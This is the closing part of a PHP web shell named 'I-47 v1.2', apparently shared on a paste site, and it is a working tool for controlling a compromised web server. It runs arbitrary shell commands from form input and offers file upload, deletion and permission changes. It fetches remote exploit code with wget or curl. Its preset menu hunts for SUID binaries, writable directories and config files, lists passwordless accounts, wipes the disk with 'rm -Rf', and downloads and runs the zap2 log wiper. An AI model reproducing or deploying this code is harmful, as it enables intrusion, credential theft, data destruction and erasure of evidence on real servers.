  4148. { echo '<br><font color=red size=3>Error: Unable to create zip file for $v</font>';}
  4149. else {echo "<br><font color=lime size=3>File $v Compressed successfully</font>";}
  4150. $zip->addFile(basename($v));
  4151. $zip->close();
  4152. }
  4153. else if(is_dir($v))
  4154. {
  4155. if($os == "Linux")
  4156. {
  4157. $filename= basename($v);
  4158. execmd("tar --create --recursion --file=$filename.tar $v");
  4159. echo "<br><font color=lime size=3>File $v Compressed successfully as $v.tar</font>";
  4160. }
  4161. }
  4162. }
  4163. }
  4164. else if($_POST['choice'] == "uncompre")
  4165. {
  4166. $actbox = $_POST["actbox"];
  4167. foreach ($actbox as $v)
  4168. {
  4169. $zip = new ZipArchive;
  4170. $filename= basename($v);
  4171. $res = $zip->open($filename);
  4172. if ($res === TRUE)
  4173. {
  4174. $pieces = explode(".",$filename);
  4175. $zip->extractTo($pieces[0]);
  4176. $zip->close();
  4177. echo "<br><font color=lime size=3>File $v Unzipped successfully</font>";
  4178. } else {
  4179. echo "<br><font color=red size=3>Error: Unable to Unzip file $v</font>";
  4180. }
  4181. }
  4182. }
  4183. }
  4184.  
  4185. else if(isset($_POST['execute']))
  4186. {
  4187. $comm = $_POST['execute'];
  4188. chdir($_POST['executepath']);
  4189. $check = shell_exec($comm);
  4190.  
  4191. echo "<textarea cols=120 rows=20 class=box>" . $check . "</textarea>";
  4192.  
  4193. ?>
  4194. <BR><BR><center><form action="<?php $self; ?>" method="post">
  4195. <input type="hidden" name="executepath" value="<?php echo $_POST['executepath']; ?>" />
  4196. <input type="text" class="box" name="execute">
  4197. <input type="submit" value="Execute" class="but"></form></center>
  4198. <?php
  4199. }
  4200.  
  4201. else if(isset($_POST['Create']))
  4202. {
  4203. ?>
  4204. <form method="post">
  4205.  
  4206. <input type="hidden" name="filecreator" value="<?php echo $_POST['createfile']; ?>">
  4207. <textarea name="filecontent" rows="20" cols="100" class="box"></textarea><br />
  4208. <input name="createmyfile" type="Submit" value=" Save " id="spacing" class="but"/>
  4209. </form>
  4210.  
  4211. <?php }
  4212.  
  4213. else
  4214. {
  4215.  
  4216. $mydir = basename(dirname(__FILE__));
  4217. $pdir = str_replace($mydir,"",$dir);
  4218. $pdir = str_replace("/","",$dir);
  4219.  
  4220. $files = array();
  4221. $dirs = array();
  4222.  
  4223. $odir=opendir($dir);
  4224. while($file = readdir($odir))
  4225. {
  4226. if(is_dir($dir.'/'.$file))
  4227. {
  4228. $dirs[]=$file;
  4229. }
  4230. else
  4231. {
  4232. $files[]=$file;
  4233. }
  4234. }
  4235. $countfiles = count($dirs) + count($files);
  4236. $dircount = count($dirs);
  4237. $dircount = $dircount-2;
  4238. ?>
  4239. <table style="width:95%;" align="center" cellpadding="3">
  4240. <tr style="background-color:#161616;"><td colspan="7" align="center"><font color="red" size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
  4241. <tr style="background-color:#161616; height:12px;">
  4242. <th style="width:53%;">Name</th>
  4243. <th style="width:7%;">Size</th>
  4244. <th style="width:9%;">Permissions</th>
  4245. <th style="width:12%;">Modification Date</th>
  4246. <th style="width:6%;">Rename</th>
  4247. <th style="width:7%;">Download</th>
  4248. <th style="width:3%;">Action</th>
  4249. </tr>
  4250.  
  4251. <?php
  4252.  
  4253. if(isset($_GET['download']))
  4254. {
  4255. download();
  4256. }
  4257. ?>
  4258. <form method="post" id="myform" name="myform">
  4259. <?php
  4260. $dir = getcwd();
  4261. if(isset($_GET['dir']))
  4262. {
  4263. $dir = $_GET['dir'];
  4264. }
  4265. $i = 0;
  4266. if(is_dir($dir))
  4267. {
  4268. if($countfiles == 2)
  4269. echo "<tr><td colspan=5><center><font color=red size=3>No files or directory present or Cannot view files and directory</font></center></td></tr>";
  4270. foreach($dirs as $val)
  4271. {
  4272. $i++;
  4273. ?>
  4274. <font color="#999999">
  4275.  
  4276. <?php if($val == ".") continue; else if($val=="..") { $val = Trail($dir . $directorysperator . $val,$directorysperator); ?>
  4277. <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'"><td class='info'><a href='<?php echo $self . "?dir=".$val; ?>'><font class=txt>[ .. ]</font></a></td><td>UPDIR</td>
  4278. <td><?php if(is_writable($val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($val);?></font></a><?php } else if(is_readable($val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($val);?></font></a><?php } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($val);?></font><?php } ?></td>
  4279.  
  4280. <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
  4281. <td></td><td></td><td></td></</tr><?php continue; } ?>
  4282. <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'">
  4283. <td class='dir'><a href='<?php echo $self ?>?dir=<?php echo $dir . $directorysperator . $val; ?>'>[ <?php echo $val; ?> ]</a></td>
  4284. <td class='info'>DIR</td>
  4285. <td class='info'><?php if(is_writable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else if(is_readable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font><?php } ?></td>
  4286. <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
  4287. <td class="info"><a href="<?php echo $self;?>?getdir=<?php echo $dir; ?>&rename=<?php echo $dir . $directorysperator . $val;?>">Rename</a></td>
  4288. <td></td>
  4289. <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
  4290. </tr></font>
  4291. <?php
  4292. }
  4293. foreach($files as $val)
  4294. {
  4295. $i++;
  4296. ?>
  4297. <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'">
  4298. <td class='file'><a href='<?php echo $self ?>?open=<?php echo $dir . $directorysperator . $val; ?>'><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a></td>
  4299. <td class='info'><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></td>
  4300. <td class='info'><?php if(is_writable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else if(is_readable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font><?php } ?></td>
  4301. <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
  4302. <td class="info"><a href="<?php echo $self;?>?getdir=<?php echo $dir; ?>&rename=<?php echo $dir . $directorysperator . $val;?>">Rename</a></td>
  4303. <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>">Download</a>
  4304. <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
  4305. </tr>
  4306. <p>
  4307. <?php
  4308. }
  4309. }
  4310. else
  4311. {
  4312. echo "<p><font color=red size=4>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
  4313. }
  4314.  
  4315. echo "</table>
  4316. <div align='right' style='width:97%;'><BR><input type='checkbox' name='checkall' onclick='checkedAll();'> <font color=lime size=3>Check All </font> &nbsp;
  4317. <select class=sbox name=choice style='width: 100px;'>
  4318. <option value=delete>Delete</option>
  4319. <option value=chmod>Change mode</option>
  4320. if(class_exists('ZipArchive'))
  4321. { <option value=compre>Compress</option>
  4322. <option value=uncompre>Uncompress</option> }
  4323. </select>
  4324.  
  4325. <input type=submit value=Submit name=checkoption class=but></form></div>";
  4326. }
  4327.  
  4328. ?>
  4329. </p>
  4330. <table style="width:100%;" border="1">
  4331. <tr>
  4332. <td align="center">
  4333. <form method="post" enctype="multipart/form-data">
  4334.  
  4335. Upload file : <br><input type="file" name="uploadfile" class="box" size="50"><input type="hidden" name="path" value="<?php echo $dir; ?>" />&nbsp;<input type=submit value="Upload" name="u" value="u" class="but" ></form>
  4336. <?php
  4337.  
  4338. if (is_writable($dir)) {
  4339. echo '<font color=lime>&lt; writable &gt;</font>';
  4340. } else {
  4341. echo '&lt; not writable &gt;';
  4342. }
  4343. ?>
  4344. <br>
  4345.  
  4346.  
  4347.  
  4348. </td>
  4349. <td align="center" style="height:105px;">Create File :
  4350. <form method="post">
  4351. <input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile"> <input type="submit" value="Create" name="Create" class="but">
  4352. </form>
  4353. <?php
  4354.  
  4355. if (is_writable($dir)) {
  4356. echo '<font color=lime>&lt; writable &gt;</font>';
  4357. } else {
  4358. echo '&lt; not writable &gt;';
  4359. }
  4360. ?>
  4361. </td>
  4362. </tr>
  4363. <tr>
  4364. <td align="center" style="height:105px;">Execute : <form action="<?php echo $self; ?>" method="post">
  4365. <input type="hidden" name="executepath" value="<?php echo $dir; ?>" />
  4366. <input type="text" class="box" name="execute"> <input type="submit" value="Execute" class="but"></form></td>
  4367.  
  4368. <td align="center">Create Directory : <form method="post">
  4369. <input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder">
  4370. <input type="submit" value="Create Directory" name="createdir" class="but">
  4371. </form><?php
  4372.  
  4373. if (is_writable($dir)) {
  4374. echo '<font color=lime>&lt; writable &gt;</font>';
  4375. } else {
  4376. echo '&lt; not writable &gt;';
  4377. }
  4378. ?></td></tr>
  4379. <tr><td style="height:105px;" align="center">Get Exploit&nbsp;<form method="post" actions="<?php echo $self; ?>">
  4380. <input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c"><br><br>
  4381. <input type="hidden" name="path" value="<?php echo $dir; ?>">
  4382. <select name="functiontype" class="sbox">
  4383. <option value="wwget">wget</option>
  4384. <option value="wlynx">lynx</option>
  4385. <option value="wfread">fread</option>
  4386. <option value="wfetch">fetch</option>
  4387. <option value="wlinks">links</option>
  4388. <option value="wget">GET</option>
  4389. <option value="wcurl">curl</option>
  4390. </select>
  4391. <input type="submit" name="uploadurl" value=" G0 " class="but"></form>
  4392. </td>
  4393. <td align="center">
  4394. <form method="post" action="<?php echo $self; ?>">
  4395. Some Commands<br>
  4396. <?php if($os != "Windows")
  4397. { ?>
  4398. <SELECT NAME="mycmd" class="box">
  4399. <OPTION VALUE="uname -a">Kernel version
  4400. <OPTION VALUE="w">Logged in users
  4401. <OPTION VALUE="lastlog">Last to connect
  4402. <option value='cat /etc/hosts'>IP Addresses
  4403. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
  4404. <OPTION VALUE="logeraser">Log Eraser
  4405. <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
  4406. <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
  4407. <OPTION VALUE="find / -type f -name \"config*\"">find config* files
  4408. <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
  4409. <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
  4410. <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
  4411. <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
  4412. <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
  4413. <OPTION VALUE="which wget curl w3m lynx">Downloaders?
  4414. <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
  4415. <OPTION VALUE="ps aux">Show running proccess
  4416. <OPTION VALUE="uptime">Uptime check
  4417. <OPTION VALUE="cat /proc/meminfo">Memory check
  4418. <OPTION VALUE="netstat -an | grep -i listen">Open ports
  4419. <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
  4420. <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
  4421. <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
  4422. <OPTION VALUE="./zap2">WIPELOGS PT3
  4423. <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
  4424. </SELECT>
  4425. <?php } else {?>
  4426. <SELECT NAME="mycmd" class="box">
  4427. <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
  4428. <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
  4429. <OPTION VALUE="systeminfo">System Informations
  4430. <OPTION VALUE="net user">User accounts
  4431. <OPTION VALUE="netstat -an">Open ports
  4432. <OPTION VALUE="getmac">Get Mac Address
  4433. <OPTION VALUE="net start">Show running services
  4434. <OPTION VALUE="net view">Show computers
  4435. <OPTION VALUE="arp -a">ARP Table
  4436. <OPTION VALUE="tasklist">Show Process
  4437. <OPTION VALUE="ipconfig/all">IP Configuration
  4438. <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
  4439. </SELECT>
  4440. <?php } ?>
  4441. <input type="submit" value="Execute" class="but" name="executecmd">
  4442. </form>
  4443. </td>
  4444. </tr></table><br>
  4445.  
  4446. </td>
  4447. </tr>
  4448. </table>
  4449. <?php
  4450.  
  4451.  
  4452. //logout
  4453.  
  4454. if(isset($_GET['logout']))
  4455. {
  4456. setcookie("hacked",time() - 60*60);
  4457. header("Location:$self");
  4458. ob_end_flush();
  4459. }
  4460. ?>
  4461.  
  4462.  
  4463. <hr>
  4464. <div align="center">
  4465. <font size="6" face="Times New Roman, Times, serif" color="#00CC00">I-47 v1.2 <br>
  4466. --==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font color="#FF0000" size="6">&#2332;&#2351; &#2361;&#2367;&#2344;&#2381;&#2342;</font></a></div>
  4467. <?php }
  4468. }
  4469.  
  4470. if(isset($_POST['uname']) && isset($_POST['passwd']))
  4471. {
  4472. if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
  4473. {
  4474. setcookie("hacked", md5($pass));
  4475. $selfenter = $_SERVER["PHP_SELF"];
  4476. header("Location:$selfenter");
  4477. }
  4478. }
  4479.  
  4480. if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
  4481. {
  4482.  
  4483. ?>
  4484. <center>
  4485. <form method="POST">
  4486. <div style="background-color:#006600; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
  4487. <table cellpadding="9" cellspacing="4">
  4488. <tr>
  4489. <td align="center" colspan="2"><blink><font size="7"><b>I-47 v1.2 </b></font></blink></td>
  4490. </tr>
  4491. <tr>
  4492. <td align="right"><b>User Name : </b></td>
  4493. <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
  4494. </tr>
  4495. <tr>
  4496. <td align="right"><b>Password : </b></td>
  4497. <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
  4498. </tr>
  4499. <tr>
  4500. <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
  4501. </tr>
  4502. <tr>
  4503. <td colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
  4504. </tr>
  4505. </table>
  4506. </div>
  4507.  
  4508. </form>
  4509. </center>
  4510. <br>
  4511. </body>
  4512. </html>
  4513. <?php
  4514. }
  4515. ?>
Add Comment
Please, Sign In to add comment